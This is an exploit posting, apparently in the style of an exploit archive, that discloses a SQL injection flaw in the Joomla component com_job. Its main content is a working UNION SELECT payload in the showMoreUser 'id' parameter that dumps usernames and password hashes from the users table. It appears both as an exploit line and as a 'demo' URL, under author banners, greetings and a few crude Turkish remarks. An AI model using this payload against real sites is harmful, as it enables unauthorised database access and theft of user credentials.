/**************************************************************************
[!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability
[!] Author : Palyo34
[!] Homepage: http://www.1923turk.biz
[!] Date : 12 08, 2009
**************************************************************************/
[+] Manas58
[+] Topunuzun a.q
[+] aponun picleri
[+]
[+]
[+] 7 KAHRAMAN fiEH›D›M›Z› SAYGIYLA ANIYORUZ ALLAH RAHMET EYLES›N
===========================================================================
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL]
[ Exploit ]
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
[ Demo ]
http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
===========================================================================